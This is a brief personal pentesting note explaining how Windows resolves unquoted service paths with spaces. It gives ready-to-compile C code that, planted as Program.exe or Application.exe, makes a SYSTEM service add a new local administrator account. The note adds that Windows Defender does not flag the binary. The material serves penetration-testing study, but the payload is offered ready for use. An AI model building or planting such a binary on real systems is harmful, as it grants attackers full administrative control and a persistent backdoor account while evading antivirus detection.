Exploiting Unquoted Paths
- author:: Nathan Acks
- date:: 2022-08-17
When Windows encounters an unquoted path that contains spaces, it tries every prefix of that path that ends at a space, from shortest to longest, appending .exe to any candidate that has no extension. Thus C:\Program Files\Application Path\App.exe will cause Windows to look for the following executables, in order:
C:\Program.exe
C:\Program Files\Application.exe
C:\Program Files\Application Path\App.exe
If an executable is found on a shorter path, it is run and the remainder of the (unquoted) path is passed to it as command-line parameters.
Exploiting Services Running as SYSTEM
If a service is running as SYSTEM, the following code can be inserted (as Program.exe or Application.exe in the example above) and will add a new user with admin privileges. (USERNAME and PASSWORD obviously need to be updated to fit the current use case.)
#include <stdlib.h>
int main(void) {
    /* Create the account, then add it to the local Administrators group.
       Both commands only succeed because the service runs as SYSTEM. */
    system("net user USERNAME PASSWORD /add");
    system("net localgroup administrators USERNAME /add");
    return 0;
}
As of August 17, 2022, binaries compiled from this code are not detected as malicious by Windows Defender.